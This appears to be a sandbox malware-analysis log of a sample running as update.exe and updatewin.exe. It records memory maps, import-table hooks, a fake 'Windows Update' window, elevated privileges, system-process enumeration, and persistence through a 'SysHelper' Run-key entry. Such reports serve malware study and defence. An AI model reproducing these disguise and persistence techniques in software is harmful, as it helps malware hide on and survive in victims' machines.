Load	api-ms-win-core-localization-l1-2-1	base_address = 0x0	1	Fn
Load	api-ms-win-appmodel-runtime-l1-1-2	base_address = 0x0	1	Fn
Get Handle	c:\users\5p5nrgjn0js halpmcxz\appdata\local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\2.exe	base_address = 0xcf0000	2	Fn
Get Handle	mscoree.dll	-	1	Fn
Get Filename	api-ms-win-core-localization-l1-2-1	process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\2.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\2.exe, size = 260	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionEx, address_out = 0x75a34d28	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsAlloc, address_out = 0x75a34f2b	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsSetValue, address_out = 0x75a34208	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsGetValue, address_out = 0x75a31252	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringEx, address_out = 0x75ab47f1	1	Fn

System (1)

Operation	Additional Information	Success	Count	Logfile
Get Time	type = System Time, time = 2018-11-19 13:56:19 (UTC)		1	Fn

Environment (1)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	-		1	Fn Data

Process #12: updatewin.exe

Information	Value
ID	#12
File Name	c:\users\5p5nrgjn0js halpmcxz\appdata\local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\updatewin.exe
Command Line	"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\updatewin.exe"
Initial Working Directory	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor	Start Time: 00:01:00, Reason: Child Process
Unmonitor	End Time: 00:01:03, Reason: Self Terminated
Monitor Duration	00:00:03

OS Process Information

Information	Value
PID	0xa14
Parent PID	0x904 (c:\users\5p5nrgjn0js halpmcxz\desktop\update.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x A18 0x A20

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x0002ffff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000060000	0x00060000	0x00061fff	Pagefile Backed Memory	r	-
private_0x0000000000070000	0x00070000	0x000effff	Private Memory	rw	-
locale.nls	0x000f0000	0x00156fff	Memory Mapped File	r	-
private_0x0000000000160000	0x00160000	0x00160fff	Private Memory	rw	-
private_0x0000000000170000	0x00170000	0x001affff	Private Memory	rw	-
pagefile_0x00000000001b0000	0x001b0000	0x001b0fff	Pagefile Backed Memory	rw	-
pagefile_0x00000000001c0000	0x001c0000	0x001c1fff	Pagefile Backed Memory	r	-
private_0x00000000001d0000	0x001d0000	0x0021ffff	Private Memory	rw	-
pagefile_0x00000000001d0000	0x001d0000	0x001d1fff	Pagefile Backed Memory	r	-
pagefile_0x00000000001d0000	0x001d0000	0x001d6fff	Pagefile Backed Memory	r	-
private_0x00000000001e0000	0x001e0000	0x0021ffff	Private Memory	rw	-
private_0x0000000000220000	0x00220000	0x0031ffff	Private Memory	rw	-
private_0x0000000000320000	0x00320000	0x0041ffff	Private Memory	rw	-
pagefile_0x0000000000420000	0x00420000	0x005a7fff	Pagefile Backed Memory	r	-
pagefile_0x00000000005b0000	0x005b0000	0x00730fff	Pagefile Backed Memory	r	-
private_0x0000000000740000	0x00740000	0x0089ffff	Private Memory	rw	-
pagefile_0x0000000000740000	0x00740000	0x0081efff	Pagefile Backed Memory	r	-
pagefile_0x0000000000820000	0x00820000	0x00821fff	Pagefile Backed Memory	rw	-
msctf.dll.mui	0x00830000	0x00830fff	Memory Mapped File	rw	-
pagefile_0x0000000000840000	0x00840000	0x00841fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000840000	0x00840000	0x00840fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000850000	0x00850000	0x00850fff	Pagefile Backed Memory	r	-
private_0x0000000000860000	0x00860000	0x0089ffff	Private Memory	rw	-
sortdefault.nls	0x008a0000	0x00b6efff	Memory Mapped File	r	-
private_0x0000000000b70000	0x00b70000	0x00beffff	Private Memory	rw	-
private_0x0000000000d00000	0x00d00000	0x00d3ffff	Private Memory	rw	-
private_0x0000000000d80000	0x00d80000	0x00e7ffff	Private Memory	rw	-
updatewin.exe	0x010d0000	0x010f2fff	Memory Mapped File	rwx	... Region Actions Download Dump
pagefile_0x0000000001100000	0x01100000	0x024fffff	Pagefile Backed Memory	r	-
staticcache.dat	0x02500000	0x02e2ffff	Memory Mapped File	r	-
dwmapi.dll	0x74ce0000	0x74cf2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x74d00000	0x74d7ffff	Memory Mapped File	rwx	-
wow64cpu.dll	0x74d90000	0x74d97fff	Memory Mapped File	rwx	-
wow64win.dll	0x74da0000	0x74dfbfff	Memory Mapped File	rwx	-
wow64.dll	0x74e00000	0x74e3efff	Memory Mapped File	rwx	-
comctl32.dll	0x74ec0000	0x7505dfff	Memory Mapped File	rwx	-
winmm.dll	0x75210000	0x75241fff	Memory Mapped File	rwx	-
cryptbase.dll	0x753a0000	0x753abfff	Memory Mapped File	rwx	-
sspicli.dll	0x753b0000	0x7540ffff	Memory Mapped File	rwx	-
usp10.dll	0x75410000	0x754acfff	Memory Mapped File	rwx	-
clbcatq.dll	0x754b0000	0x75532fff	Memory Mapped File	rwx	-
ole32.dll	0x75540000	0x7569bfff	Memory Mapped File	rwx	-
user32.dll	0x756f0000	0x757effff	Memory Mapped File	rwx	-
kernel32.dll	0x75a20000	0x75b2ffff	Memory Mapped File	rwx	-
advapi32.dll	0x75b30000	0x75bcffff	Memory Mapped File	rwx	-
shlwapi.dll	0x75ce0000	0x75d36fff	Memory Mapped File	rwx	-
msctf.dll	0x75d40000	0x75e0bfff	Memory Mapped File	rwx	-
msvcrt.dll	0x75e30000	0x75edbfff	Memory Mapped File	rwx	-
oleaut32.dll	0x75f60000	0x75feefff	Memory Mapped File	rwx	-
sechost.dll	0x762b0000	0x762c8fff	Memory Mapped File	rwx	-
lpk.dll	0x762d0000	0x762d9fff	Memory Mapped File	rwx	-
imm32.dll	0x76500000	0x7655ffff	Memory Mapped File	rwx	-
kernelbase.dll	0x765f0000	0x76635fff	Memory Mapped File	rwx	-
rpcrt4.dll	0x772d0000	0x773bffff	Memory Mapped File	rwx	-
gdi32.dll	0x773c0000	0x7744ffff	Memory Mapped File	rwx	-
private_0x0000000077450000	0x77450000	0x77549fff	Private Memory	rwx	-
private_0x0000000077550000	0x77550000	0x7766efff	Private Memory	rwx	-
ntdll.dll	0x77670000	0x77818fff	Memory Mapped File	rwx	-
ntdll.dll	0x77850000	0x779cffff	Memory Mapped File	rwx	-
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	r	-
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	rw	-
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	rw	-
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	rw	-
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	rw	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	r	-

Host Behavior

File (3)

Operation	Filename	Additional Information	Count	Logfile
Open	STD_INPUT_HANDLE	-	1	Fn
Open	STD_OUTPUT_HANDLE	-	1	Fn
Open	STD_ERROR_HANDLE	-	1	Fn

Module (18)

Operation	Module	Additional Information	Count	Logfile
Load	api-ms-win-core-synch-l1-2-0	base_address = 0x0	2	Fn
Load	kernel32	base_address = 0x0	2	Fn
Load	kernel32	base_address = 0x75a20000	2	Fn
Load	api-ms-win-core-fibers-l1-1-1	base_address = 0x0	2	Fn
Load	api-ms-win-core-localization-l1-2-1	base_address = 0x0	1	Fn
Get Filename	api-ms-win-core-localization-l1-2-1	process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\updatewin.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\updatewin.exe, size = 260	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionEx, address_out = 0x75a34d28	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsAlloc, address_out = 0x75a34f2b	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsSetValue, address_out = 0x75a34208	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsGetValue, address_out = 0x75a31252	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringEx, address_out = 0x75ab47f1	1	Fn

Window (1)

Operation	Window Name	Additional Information	Success	Count	Logfile
Create	Windows Update	class_name = WINDOWSUPDATE, wndproc_parameter = 0		1	Fn

System (3)

Operation	Additional Information	Success	Count	Logfile
Sleep	duration = 1000 milliseconds (1.000 seconds)		2	Fn
Get Time	type = System Time, time = 2018-11-19 13:56:19 (UTC)		1	Fn

Environment (1)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	-		1	Fn Data

Process #14: update.exe

342

Information	Value
ID	#14
File Name	c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe
Command Line	"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe" --AutoStart
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:01:27, Reason: Autostart
Unmonitor	End Time: 00:01:50, Reason: Self Terminated
Monitor Duration	00:00:23

OS Process Information

Information	Value
PID	0x4cc
Parent PID	0x370 (c:\windows\explorer.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 4D0 0x 6F0 0x 6F4 0x 700 0x 704

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	rw	-
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	rw	-
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	r	-
locale.nls	0x001a0000	0x00206fff	Memory Mapped File	r	-
pagefile_0x0000000000210000	0x00210000	0x00214fff	Pagefile Backed Memory	rw	-
private_0x0000000000210000	0x00210000	0x0025efff	Private Memory	rw	-
private_0x0000000000210000	0x00210000	0x0024ffff	Private Memory	rw	-
pagefile_0x0000000000250000	0x00250000	0x00250fff	Pagefile Backed Memory	rw	-
private_0x0000000000260000	0x00260000	0x0029ffff	Private Memory	rw	-
pagefile_0x00000000002a0000	0x002a0000	0x002a1fff	Pagefile Backed Memory	r	-
pagefile_0x00000000002b0000	0x002b0000	0x002b0fff	Pagefile Backed Memory	r	-
private_0x00000000002c0000	0x002c0000	0x0033ffff	Private Memory	rw	-
pagefile_0x0000000000340000	0x00340000	0x00341fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000350000	0x00350000	0x00350fff	Pagefile Backed Memory	r	-
cversions.2.db	0x00360000	0x00363fff	Memory Mapped File	r	-
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db	0x00370000	0x0038ffff	Memory Mapped File	r	-
pagefile_0x0000000000390000	0x00390000	0x00390fff	Pagefile Backed Memory	rw	-
cversions.2.db	0x003a0000	0x003a3fff	Memory Mapped File	r	-
private_0x00000000003b0000	0x003b0000	0x003effff	Private Memory	rw	-
pagefile_0x00000000003f0000	0x003f0000	0x003f6fff	Pagefile Backed Memory	r	-
update.exe	0x00400000	0x0049afff	Memory Mapped File	rwx	... Region Actions Download Dump
pagefile_0x00000000004a0000	0x004a0000	0x0057efff	Pagefile Backed Memory	r	-
pagefile_0x0000000000580000	0x00580000	0x00581fff	Pagefile Backed Memory	rw	-
private_0x0000000000590000	0x00590000	0x0059ffff	Private Memory	rw	-
pagefile_0x00000000005a0000	0x005a0000	0x005a0fff	Pagefile Backed Memory	rw	-
private_0x00000000005c0000	0x005c0000	0x006bffff	Private Memory	rw	-
pagefile_0x00000000006c0000	0x006c0000	0x00847fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000850000	0x00850000	0x009d0fff	Pagefile Backed Memory	r	-
pagefile_0x00000000009e0000	0x009e0000	0x01ddffff	Pagefile Backed Memory	r	-
private_0x0000000001de0000	0x01de0000	0x01efffff	Private Memory	rw	-
private_0x0000000001de0000	0x01de0000	0x01edffff	Private Memory	rw	-
private_0x0000000001ef0000	0x01ef0000	0x01efffff	Private Memory	rw	-
private_0x0000000001f00000	0x01f00000	0x0202ffff	Private Memory	rw	-
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db	0x01f00000	0x01f2ffff	Memory Mapped File	r	-
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db	0x01f30000	0x01f95fff	Memory Mapped File	r	-
private_0x0000000001fa0000	0x01fa0000	0x01fdffff	Private Memory	rw	-
private_0x0000000001ff0000	0x01ff0000	0x0202ffff	Private Memory	rw	-
private_0x0000000002030000	0x02030000	0x0216ffff	Private Memory	rw	-
private_0x0000000002030000	0x02030000	0x0212ffff	Private Memory	rw	-
private_0x0000000002160000	0x02160000	0x0216ffff	Private Memory	rw	-
sortdefault.nls	0x02170000	0x0243efff	Memory Mapped File	r	-
pagefile_0x0000000002440000	0x02440000	0x02832fff	Pagefile Backed Memory	r	-
private_0x0000000002840000	0x02840000	0x0287ffff	Private Memory	rw	-
private_0x0000000002880000	0x02880000	0x0297ffff	Private Memory	rw	-
private_0x0000000002980000	0x02980000	0x029bffff	Private Memory	rw	-
private_0x00000000029c0000	0x029c0000	0x02abffff	Private Memory	rw	-
msimg32.dll	0x73830000	0x73834fff	Memory Mapped File	rwx	-
uxtheme.dll	0x73dd0000	0x73e4ffff	Memory Mapped File	rwx	-
wow64win.dll	0x73ff0000	0x7404bfff	Memory Mapped File	rwx	-
shdocvw.dll	0x74eb0000	0x74eddfff	Memory Mapped File	rwx	-
apphelp.dll	0x74ee0000	0x74f2bfff	Memory Mapped File	rwx	-
profapi.dll	0x74f30000	0x74f3afff	Memory Mapped File	rwx	-
ntmarta.dll	0x74f40000	0x74f60fff	Memory Mapped File	rwx	-
comctl32.dll	0x74f70000	0x7510dfff	Memory Mapped File	rwx	-
propsys.dll	0x75110000	0x75204fff	Memory Mapped File	rwx	-
msvcr100.dll	0x75210000	0x752cefff	Memory Mapped File	rwx	-
dnsapi.dll	0x752d0000	0x75313fff	Memory Mapped File	rwx	-
winnsi.dll	0x75320000	0x75326fff	Memory Mapped File	rwx	-
iphlpapi.dll	0x75330000	0x7534bfff	Memory Mapped File	rwx	-
winmm.dll	0x75350000	0x75381fff	Memory Mapped File	rwx	-
mpr.dll	0x75390000	0x753a1fff	Memory Mapped File	rwx	-
wow64cpu.dll	0x754a0000	0x754a7fff	Memory Mapped File	rwx	-
wow64.dll	0x754b0000	0x754eefff	Memory Mapped File	rwx	-
cryptbase.dll	0x755e0000	0x755ebfff	Memory Mapped File	rwx	-
sspicli.dll	0x755f0000	0x7564ffff	Memory Mapped File	rwx	-
msctf.dll	0x75650000	0x7571bfff	Memory Mapped File	rwx	-
advapi32.dll	0x75720000	0x757bffff	Memory Mapped File	rwx	-
ws2_32.dll	0x757d0000	0x75804fff	Memory Mapped File	rwx	-
ole32.dll	0x75810000	0x7596bfff	Memory Mapped File	rwx	-
msasn1.dll	0x75970000	0x7597bfff	Memory Mapped File	rwx	-
crypt32.dll	0x75980000	0x75a9cfff	Memory Mapped File	rwx	-
usp10.dll	0x75b30000	0x75bccfff	Memory Mapped File	rwx	-
wininet.dll	0x75bd0000	0x75cc4fff	Memory Mapped File	rwx	-
imm32.dll	0x75d30000	0x75d8ffff	Memory Mapped File	rwx	-
msvcrt.dll	0x75d90000	0x75e3bfff	Memory Mapped File	rwx	-
lpk.dll	0x75e40000	0x75e49fff	Memory Mapped File	rwx	-
user32.dll	0x75e50000	0x75f4ffff	Memory Mapped File	rwx	-
kernelbase.dll	0x75f50000	0x75f95fff	Memory Mapped File	rwx	-
shell32.dll	0x75fa0000	0x76be9fff	Memory Mapped File	rwx	-
wldap32.dll	0x76bf0000	0x76c34fff	Memory Mapped File	rwx	-
iertutil.dll	0x76c40000	0x76e3afff	Memory Mapped File	rwx	-
shlwapi.dll	0x76e40000	0x76e96fff	Memory Mapped File	rwx	-
sechost.dll	0x76ea0000	0x76eb8fff	Memory Mapped File	rwx	-
urlmon.dll	0x76ec0000	0x76ff5fff	Memory Mapped File	rwx	-
oleaut32.dll	0x77000000	0x7708efff	Memory Mapped File	rwx	-
psapi.dll	0x770c0000	0x770c4fff	Memory Mapped File	rwx	-
rpcrt4.dll	0x77150000	0x7723ffff	Memory Mapped File	rwx	-
devobj.dll	0x77240000	0x77251fff	Memory Mapped File	rwx	-
cfgmgr32.dll	0x77260000	0x77286fff	Memory Mapped File	rwx	-
gdi32.dll	0x77290000	0x7731ffff	Memory Mapped File	rwx	-
clbcatq.dll	0x77350000	0x773d2fff	Memory Mapped File	rwx	-
kernel32.dll	0x773e0000	0x774effff	Memory Mapped File	rwx	-
setupapi.dll	0x774f0000	0x7768cfff	Memory Mapped File	rwx	-
private_0x0000000077690000	0x77690000	0x777aefff	Private Memory	rwx	-
private_0x00000000777b0000	0x777b0000	0x778a9fff	Private Memory	rwx	-
ntdll.dll	0x778b0000	0x77a58fff	Memory Mapped File	rwx	-
nsi.dll	0x77a60000	0x77a65fff	Memory Mapped File	rwx	-
ntdll.dll	0x77a90000	0x77c0ffff	Memory Mapped File	rwx	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x00000000fffaa000	0xfffaa000	0xfffacfff	Private Memory	rw	-
private_0x00000000fffad000	0xfffad000	0xfffaffff	Private Memory	rw	-
pagefile_0x00000000fffb0000	0xfffb0000	0xfffd2fff	Pagefile Backed Memory	r	-
private_0x00000000fffd5000	0xfffd5000	0xfffd7fff	Private Memory	rw	-
private_0x00000000fffd8000	0xfffd8000	0xfffdafff	Private Memory	rw	-
private_0x00000000fffdb000	0xfffdb000	0xfffddfff	Private Memory	rw	-
private_0x00000000fffde000	0xfffde000	0xfffdefff	Private Memory	rw	-
private_0x00000000fffdf000	0xfffdf000	0xfffdffff	Private Memory	rw	-
private_0x00000000fffe0000	0xfffe0000	0x7fffffeffff	Private Memory	r	-

Hook Information

Type	Installer	Target	Size	Information	Actions
IAT	private_0x00000000005c0000:+0x135af	13. entry of update.exe	4 bytes	kernel32.dll:GetCommProperties+0x0 now points to private_0x00000000005c0000:+0xe006a	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x135af	14. entry of update.exe	4 bytes	kernel32.dll:GetThreadSelectorEntry+0x0 now points to pagefile_0x00000000009e0000:+0x4977e8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x135af	18. entry of update.exe	4 bytes	kernel32.dll:GetLastError+0x0 now points to pagefile_0x0000000000010000:+0x25d7	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x135af	21. entry of update.exe	4 bytes	kernel32.dll:SetLastError+0x0 now points to private_0x00000000005c0000:+0xe006a	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x135af	22. entry of update.exe	4 bytes	kernel32.dll:CompareStringW+0x0 now points to pagefile_0x00000000009e0000:+0x49c7e8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x135af	24. entry of update.exe	4 bytes	kernel32.dll:GetLocaleInfoW+0x0 now points to pagefile_0x00000000009e0000:+0x50043	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x135af	26. entry of update.exe	4 bytes	kernel32.dll:GetProcessHeap+0x0 now points to pagefile_0x0000000000010000:+0x25b7	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x135af	37. entry of update.exe	4 bytes	kernel32.dll:FreeLibrary+0x0 now points to pagefile_0x00000000009e0000:+0x168be8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x00000000005c0000:+0x135af	64. entry of update.exe	4 bytes	kernel32.dll:MultiByteToWideChar+0x0 now points to pagefile_0x00000000009e0000:+0xd58d56	... Actions Go to Installer Region Go to Target Region

Host Behavior

File (6)

Operation	Filename	Additional Information	Count	Logfile
Open	STD_INPUT_HANDLE	-	2	Fn
Open	STD_OUTPUT_HANDLE	-	2	Fn
Open	STD_ERROR_HANDLE	-	2	Fn

Registry (2)

Operation	Key	Additional Information	Success	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	-		1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe" --AutoStart, type = REG_EXPAND_SZ		1	Fn

Process (26)

Operation	Process	Additional Information	Count	Logfile
Create	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	show_window = SW_SHOW	1	Fn
Open	System	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\smss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\wininit.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\winlogon.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\services.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\lsass.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\lsm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\audiodg.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\userinit.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\spoolsv.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\adobe\reader 10.0\reader\reader_sl.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dllhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn

Module (292)

Operation	Module	Additional Information	Count	Logfile
Load	kernel32.dll	base_address = 0x773e0000	2	Fn
Load	RPCRT4.dll	base_address = 0x77150000	1	Fn
Load	MPR.dll	base_address = 0x75390000	1	Fn
Load	WININET.dll	base_address = 0x75bd0000	1	Fn
Load	WINMM.dll	base_address = 0x75350000	1	Fn
Load	SHLWAPI.dll	base_address = 0x76e40000	1	Fn
Load	KERNEL32.dll	base_address = 0x773e0000	1	Fn
Load	USER32.dll	base_address = 0x75e50000	1	Fn
Load	ADVAPI32.dll	base_address = 0x75720000	1	Fn
Load	SHELL32.dll	base_address = 0x75fa0000	1	Fn
Load	ole32.dll	base_address = 0x75810000	1	Fn
Load	OLEAUT32.dll	base_address = 0x77000000	1	Fn
Load	IPHLPAPI.DLL	base_address = 0x75330000	1	Fn
Load	WS2_32.dll	base_address = 0x757d0000	1	Fn
Load	DNSAPI.dll	base_address = 0x752d0000	1	Fn
Load	msvcr100.dll	base_address = 0x75210000	1	Fn
Load	Psapi.dll	base_address = 0x770c0000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x773e0000	13	Fn
Get Handle	mscoree.dll	-	1	Fn
Get Filename	-	process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe, size = 260	2	Fn
Get Filename	-	process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe, size = 1024	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsAlloc, address_out = 0x773f4f2b	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsGetValue, address_out = 0x773f1252	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsSetValue, address_out = 0x773f4208	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsFree, address_out = 0x773f359f	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EncodePointer, address_out = 0x77ad0fcb	9	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DecodePointer, address_out = 0x77ac9d35	4	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateToolhelp32Snapshot, address_out = 0x7741735f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Module32First, address_out = 0x77475cd9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x773f1856	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualProtect, address_out = 0x773f435f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFree, address_out = 0x773f186e	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersionExA, address_out = 0x773f3519	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateProcess, address_out = 0x7740d802	2	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = RpcStringFreeW, address_out = 0x77171635	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidToStringW, address_out = 0x77191ee5	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidToStringA, address_out = 0x771cd918	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = RpcStringFreeA, address_out = 0x77193fc5	1	Fn
